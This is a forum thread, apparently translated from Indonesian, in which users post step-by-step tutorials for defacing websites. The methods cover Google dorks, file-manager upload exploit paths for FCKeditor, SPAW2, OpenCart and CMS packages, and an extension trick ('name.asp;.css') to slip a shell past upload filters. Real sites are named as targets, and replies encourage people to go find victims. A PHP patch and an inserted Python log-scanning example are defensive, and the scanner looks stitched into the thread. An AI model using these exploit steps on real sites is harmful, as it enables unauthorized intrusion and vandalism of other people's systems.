|
| Defacing an OpenCart Website | |
|
| Author | Message |
---|
ASSOCK Top Nubie
Posts : 40 Points : 118 Reputation : 7 Join date : 07.02.12
| Subject: Defacing an OpenCart Website Mon Feb 13, 2012 10:24 pm | |
| OK.. Here I will post.. how to deface an OpenCart website.. You can also look for the bug on Google.. Step 1: Find Notepad to edit your deface and HTML file.. Step 2: Name your upload file [index.htm] or [index.html]; it can also be index.php. Step 3: You can take the deface upload you want from below. Once everything is fixed .. try uploading it here [You must be registered and logged in to see this link.] Change the connector from ASP to PHP, and change Resource Type from "None" to "File". Once it has been uploaded .. try testing it at [You must be registered and logged in to see this link.] your html file).htm You can also deface other OpenCart sites .. with the dork "Powered by open cart". For example, once you have a target web, just add " [You must be registered and logged in to see this link.] Good luck. Here is my contribution .. [You must be registered and logged in to see this link.] If it works .. please share it here | |
| | | nubitohacker NuuBiiTooL
Posts : 3 Points : 7 Reputation : 0 Join date : 03.01.12
| Subject: Re: Defacing an OpenCart Website Tue Feb 14, 2012 12:28 am | |
| Let me add to that - Quote :
Method 1 - Quote :
- "Deface using ASPX":
DORK : inurl:Fck/fcklinkgallery.aspx or /portals/0/ inurl:tabid/176/Default.aspx Pick one of the dorks. Once you have found a target, append this: "providers/htmleditorproviders/fck/fcklinkgallery.aspx Here I use the dork inurl:Fck/fcklinkgallery.aspx and the target [URL="http://www.pivocom.com"] [You must be registered and logged in to see this link.] as the example.. so it becomes like this : [URL="http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"] [You must be registered and logged in to see this link.] After clicking that, wait until it finishes loading, then you have to click (File A file on your site) and change the website's protocol address to : javascript:__doPostBack('ctlURL$cmdUpload','' ) The browse button will then appear by itself, like this.. [You must be registered and logged in to see this image.] Then upload the file you want to put in. The files that can be uploaded include: *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp. If you don't have the shell, just download it here [URL="http://www.media*fire..com/?72blav74ddvdtea"] [You must be registered and logged in to see this link.] But not every web allows uploading .html files; there are some sites that only allow uploading .txt files. Before uploading, change the extension to css, e.g. : hacker.asp;.css Remember ! we have to add the dot twice [exampleshellname(.)asp(.)css] so that it ends in ".asp;.css", e.g. : "hacker.asp;.css" Upload, then we open the deface result . .
First we look at the name of the file we uploaded, e.g. : "hacker.asp;.css". We open its protocol address this way : the address earlier was "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ noting that this is after we have succeeded / finished uploading ]. After that, change the address "http://www.pivocom.com/ Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" to the address of our defaced page, which becomes [URL="http://www.pivocom.com/portals/0/"] [You must be registered and logged in to see this link.] The point is that we have to add " portals/0/" at the end of [You must be registered and logged in to see this link.]
Method 2 - Quote :
- "Deface a web with SPAW Vulnerability":
DORK inurl:spaw2/dialogs/ or inurl:spaw2/uploads/files/ POC spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9 Once you have found the target, for example like this : [URL="http://olgabz.com/spaw2/dialogs/"] [You must be registered and logged in to see this link.] then replace spaw2/dialogs/ with spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9 so it becomes like this [URL="http://olgabz.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da752d9%208cac9"] [You must be registered and logged in to see this link.] The SPAW File Manager will then appear, see the picture below : [spoiler="screenshot"] [You must be registered and logged in to see this image.]
Don't forget to change the type from image to File, and then you just upload your file.. Once that is done, what next...??
Then check whether your file has gone in yet, as in the picture below:
- screenshot:
[You must be registered and logged in to see this image.]
So how do we see the result of our deface??? To do that, click the file you uploaded; a "download file" text will appear on the right, click it, and your deface file will come up like this..
here is the result [You must be registered and logged in to see this link.]
That's it, the deface is done, easy right ???
Method 3 - Quote :
- "deface with the opencart method":
Sorry, this is specifically for newbies who want to learn; if you already know it, I ask for your guidance .. As usual, search via Google. The dork : SUPORT BY OPENCART or Powered By OpenCart site:com (you can change the site, such as my, il, etc.; what matters is that it supports opencart). If you want all of them, drop the site so it is just Powered By OpenCart. Straight to the method: once you have got the target, for example the target [URL="http://www.digitalbazzar.co.uk/shop"] [You must be registered and logged in to see this link.] or also [URL=" [You must be registered and logged in to see this link.] etc. Once you have the target, we just inject the exploit admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html so it becomes like this [URL="http://www.digitalbazzar.co.uk/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html"] [You must be registered and logged in to see this link.] If you come across one like this [URL="http://digitalbazzar.co.uk/shop/"] [You must be registered and logged in to see this link.] you inject it after the /shop/ .. and then a display like this will appear.. - screenshot:
[You must be registered and logged in to see this image.]
Don't forget to change the connector to PHP. Then put in your deface file; if it succeeds there is an alert reading "file uploaded with no errors". To see whether it was uploaded or not, go to "Get Folders and Files" and look at the result... :P If it succeeded, you just put the name of your deface file after the site, and the result is like this.. [URL="http://www.digitalbazzar.co.uk/"] [You must be registered and logged in to see this link.]
Method 4 - Quote :
- [spoiler="Deface with Patch Bug CMS Lokomedia":1bd8]example [URL="http://error404.000webhost.com/?"] View[/URL]
DORK=
- inurl:"admin/foto_berita/"
- inurl:"media.php?module="
- allinurl:/media.php?module=berita
just pick one ..
path : /admin/content.php?module=user
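PATCH: the bugs in CMS Lokomedia can be fixed by patching the file /admin/content.php, adding the following code fragment :
    session_start();
    // Deny the request unless both login session values are present
    if (empty($_SESSION['namauser']) || empty($_SESSION['passuser'])) {
        // Message: "Sorry, you are not allowed to run this module"
        echo "Maaf anda tidak berhak menjalankan modul ini";
    } else {
        // ..... Statement
    }
Add the same code fragment to the file /admin/aksi.php
    session_start();
    // Deny the request unless both login session values are present
    if (empty($_SESSION['namauser']) || empty($_SESSION['passuser'])) {
        // Message: "Sorry, you are not allowed to run this module"
        echo "Maaf anda tidak berhak menjalankan modul ini";
    } else {
        // ..... Statement
    }
Filter the files that will be uploaded, in the code of the file aksi.php used when editing a news item, with the following code fragment:
    // $tipe_file and $nama_file are set earlier in aksi.php (not shown in the post)
    if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg") {
        // Message: "Failed to save data !!! File type ... Allowed file type is : JPG/JPEG."
        echo "Gagal menyimpan data !!! Tipe file $nama_file : $tipe_file Tipe file yang diperbolehkan adalah : JPG/JPEG. ";
        echo "Ulangi Lagi"; // "Try again"
    } else {
        // ..... statement
    }
Method 5 - Quote :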
- "Deface CMS Balitbang 3.42":
The dorks: inurl:/html/siswa.php? inurl:/html/alumni.php? inurl:/html/guru.php? Exploit : [You must be registered and logged in to see this link.] just pick one ... Once you have picked a target, put in the exploit, for example : Code: [You must be registered and logged in to see this link.]/editor/filemanager/connectors/uploadtest.html then change the connector from ASP --> PHP, and just put in your file... but it has to be in .TXT form.
| |
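For site owners, the request paths named in the posts above make usable detection patterns. The following is an added example, not part of the thread: a Python scan of web-server access logs for requests to those editor file-manager pages and for upload names shaped like `name.asp;.css`. The log format (common/combined), the finding labels and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Request targets named in the thread: editor file-manager test pages and
# an admin module that should not answer unauthenticated requests.
PROBES = {
    "fckeditor-connector-test": r"/filemanager/connectors/(?:upload)?test\.html",
    "dnn-fcklinkgallery": r"/fck/fcklinkgallery\.aspx",
    "spaw2-file-manager": r"/spaw2/dialogs/dialog\.php\?.*module=spawfm",
    "lokomedia-admin-module": r"/admin/content\.php\?module=user",
}
PROBES = {name: re.compile(rx, re.I) for name, rx in PROBES.items()}
# Upload names shaped like "name.asp;.css": a script extension followed by
# ';' or by a second extension in the last path segment.
SCRIPT_EXT = re.compile(r"\.(?:aspx?|php|phtml|jsp)[;.][^/]*$", re.I)
# Common/combined log prefix: ip, ident, user, [time], "request", status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = unquote(m["target"])  # decode %3B etc. before matching
    hits = [name for name, rx in PROBES.items() if rx.search(target)]
    if SCRIPT_EXT.search(target.split("?", 1)[0]):
        hits.append("script-extension-in-filename")
    if not hits:
        return None
    # A 2xx answer means the component is reachable, not merely probed.
    return {"ip": m["ip"], "target": target, "hits": hits,
            "exposed": 200 <= int(m["status"]) < 300}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation-range IPs, made-up requests).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Mar/2012:08:42:01 +0700] "GET /shop/admin/view/javascript/'
    'fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Mar/2012:08:43:10 +0700] "GET /portals/0/x.asp%3B.css HTTP/1.1" 404 312',
    '198.51.100.20 - - [27/Mar/2012:08:44:00 +0700] "GET /index.php?route=common/home HTTP/1.1" 200 8841',
    '198.51.100.9 - - [27/Mar/2012:08:45:30 +0700] "GET /spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `exposed` set to true means the test page or connector answered with a 2xx status, so that file should be removed from the deployment or put behind authentication.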
| | | RizkyHacks NuuBiiTooL
Posts : 10 Points : 19 Reputation : 1 Join date : 26.03.12 Age : 29 Location : Neraka Kanan
| Subject: Re: Defacing an OpenCart Website Mon Mar 26, 2012 10:23 pm | |
| | |
| | | skdcyber Trainee
Posts : 76 Points : 83 Reputation : 3 Join date : 21.11.11 Location : cikarang
| Subject: Re: Defacing an OpenCart Website Tue Mar 27, 2012 8:36 am | |
| I'll join in too, there's even a song,,, hehehe thanks bro,,, [You must be registered and logged in to see this link.] | |
| | | robofics VIP Member
Posts : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Location : /dev/null
| Subject: Re: Defacing an OpenCart Website Tue Mar 27, 2012 8:42 am | |
| another useful dork - Code:
-
intitle:"FCKeditor" inurl:uploadtest.html | |
| | | skdcyber Trainee
Posts : 76 Points : 83 Reputation : 3 Join date : 21.11.11 Location : cikarang
| | | | rebel battle Trainee
Posts : 96 Points : 101 Reputation : 1 Join date : 30.12.11
| Subject: Re: Defacing an OpenCart Website Tue Mar 27, 2012 10:42 am | |
| | |
| | | #OPS Pro Nubie
Posts : 61 Points : 86 Reputation : 13 Join date : 04.02.12 Age : 35 Location : Lampung City
| | | | #OPS Pro Nubie
Posts : 61 Points : 86 Reputation : 13 Join date : 04.02.12 Age : 35 Location : Lampung City
| Subject: Re: Defacing an OpenCart Website Tue Mar 27, 2012 2:56 pm | |
| | |
| | | robofics VIP Member
Posts : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Location : /dev/null
| | | | BumiayuKita Administrator
Posts : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Location : bumiayu
| Subject: Re: Defacing an OpenCart Website Wed Mar 28, 2012 11:37 pm | |
| | |
| | | ahsanovic NuuBiiTooL
Posts : 10 Points : 10 Reputation : 0 Join date : 14.03.12
| Subject: Re: Defacing an OpenCart Website Thu Nov 08, 2012 12:40 pm | |
| off to look for a target | |